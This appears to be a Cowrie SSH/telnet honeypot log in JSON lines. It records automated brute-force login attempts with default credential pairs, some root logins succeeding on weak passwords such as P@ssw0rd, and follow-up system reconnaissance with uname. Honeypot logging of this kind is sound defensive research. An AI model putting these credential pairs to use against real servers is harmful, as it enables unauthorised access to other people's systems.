{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:15.313570Z","src_ip":"45.125.211.194","session":"d553fa9e35c6"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T03:00:16.145878Z","src_ip":"45.125.211.194","session":"d553fa9e35c6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:17.355940Z","src_ip":"45.125.211.194","session":"d553fa9e35c6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":62183,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd04a53beaac","protocol":"ssh","message":"New connection: 45.125.211.194:62183 (1.2.3.4:22) [session: cd04a53beaac]","sensor":"my-vps","timestamp":"2025-08-28T03:00:29.980705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:30.010588Z","src_ip":"45.125.211.194","session":"cd04a53beaac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:30.217456Z","src_ip":"45.125.211.194","session":"cd04a53beaac"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T03:00:31.029149Z","src_ip":"45.125.211.194","session":"cd04a53beaac"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:32.240941Z","src_ip":"45.125.211.194","session":"cd04a53beaac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45604,"dst_ip":"1.2.3.4","dst_port":22,"session":"59317ea6f5e3","protocol":"ssh","message":"New connection: 212.227.235.229:45604 (1.2.3.4:22) [session: 59317ea6f5e3]","sensor":"my-vps","timestamp":"2025-08-28T03:00:39.286732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:39.288907Z","src_ip":"212.227.235.229","session":"59317ea6f5e3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:00:39.396294Z","src_ip":"212.227.235.229","session":"59317ea6f5e3"}
{"eventid":"cowrie.login.failed","username":"cassandra","password":"cassandra123","message":"login attempt [cassandra/cassandra123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:00:39.719215Z","src_ip":"212.227.235.229","session":"59317ea6f5e3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:40.829159Z","src_ip":"212.227.235.229","session":"59317ea6f5e3"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":44666,"dst_ip":"1.2.3.4","dst_port":22,"session":"e762c3dbd767","protocol":"ssh","message":"New connection: 194.233.79.134:44666 (1.2.3.4:22) [session: e762c3dbd767]","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.391590Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65032,"dst_ip":"1.2.3.4","dst_port":22,"session":"15a604b4c4a6","protocol":"ssh","message":"New connection: 217.72.205.35:65032 (1.2.3.4:22) [session: 15a604b4c4a6]","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.560833Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.562321Z","src_ip":"217.72.205.35","session":"15a604b4c4a6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.722451Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64055,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c31dc805dab","protocol":"ssh","message":"New connection: 45.125.211.194:64055 (1.2.3.4:22) [session: 3c31dc805dab]","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.898688Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.905056Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:44.915757Z","src_ip":"45.125.211.194","session":"3c31dc805dab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:45.119527Z","src_ip":"45.125.211.194","session":"3c31dc805dab"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:00:45.938213Z","src_ip":"45.125.211.194","session":"3c31dc805dab"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:47.147060Z","src_ip":"45.125.211.194","session":"3c31dc805dab"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:00:50.121378Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:00:51.194427Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:00:51.195120Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:52.659501Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:00:52.661036Z","src_ip":"194.233.79.134","session":"e762c3dbd767"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":12322,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e450026acef","protocol":"ssh","message":"New connection: 45.125.211.194:12322 (1.2.3.4:22) [session: 1e450026acef]","sensor":"my-vps","timestamp":"2025-08-28T03:00:59.729677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:00:59.761200Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:00:59.960240Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:01:00.836706Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:01:01.341016Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:01:01.342131Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:01.565696Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:01.567056Z","src_ip":"45.125.211.194","session":"1e450026acef"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":24863,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0af3f3f883c","protocol":"ssh","message":"New connection: 45.125.211.194:24863 (1.2.3.4:22) [session: c0af3f3f883c]","sensor":"my-vps","timestamp":"2025-08-28T03:01:14.499399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:01:14.523058Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:01:14.746077Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:01:15.608774Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:01:16.175511Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:01:16.176665Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:16.400377Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:16.401563Z","src_ip":"45.125.211.194","session":"c0af3f3f883c"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":42468,"dst_ip":"1.2.3.4","dst_port":22,"session":"482bb358e5db","protocol":"ssh","message":"New connection: 45.125.211.194:42468 (1.2.3.4:22) [session: 482bb358e5db]","sensor":"my-vps","timestamp":"2025-08-28T03:01:29.251431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:01:29.272820Z","src_ip":"45.125.211.194","session":"482bb358e5db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:01:29.466849Z","src_ip":"45.125.211.194","session":"482bb358e5db"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T03:01:30.303870Z","src_ip":"45.125.211.194","session":"482bb358e5db"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:01:31.516026Z","src_ip":"45.125.211.194","session":"482bb358e5db"}
{"eventid":"cowrie.session.connect","src_ip":"171.244.201.132","src_port":55778,"dst_ip":"1.2.3.4","dst_port":23,"session":"a20c72f0add4","protocol":"telnet","message":"New connection: 171.244.201.132:55778 (1.2.3.4:23) [session: a20c72f0add4]","sensor":"my-vps","timestamp":"2025-08-28T03:01:42.701386Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T03:01:43.345622Z","src_ip":"171.244.201.132","session":"a20c72f0add4"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":29472,"dst_ip":"1.2.3.4","dst_port":22,"session":"d24f56ca9fdf","protocol":"ssh","message":"New connection: 45.125.211.194:29472 (1.2.3.4:22) [session: d24f56ca9fdf]","sensor":"my-vps","timestamp":"2025-08-28T03:01:44.076178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:01:44.111551Z","src_ip":"45.125.211.194","session":"d24f56ca9fdf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:01:44.296987Z","src_ip":"45.125.211.194","session":"d24f56ca9fdf"}
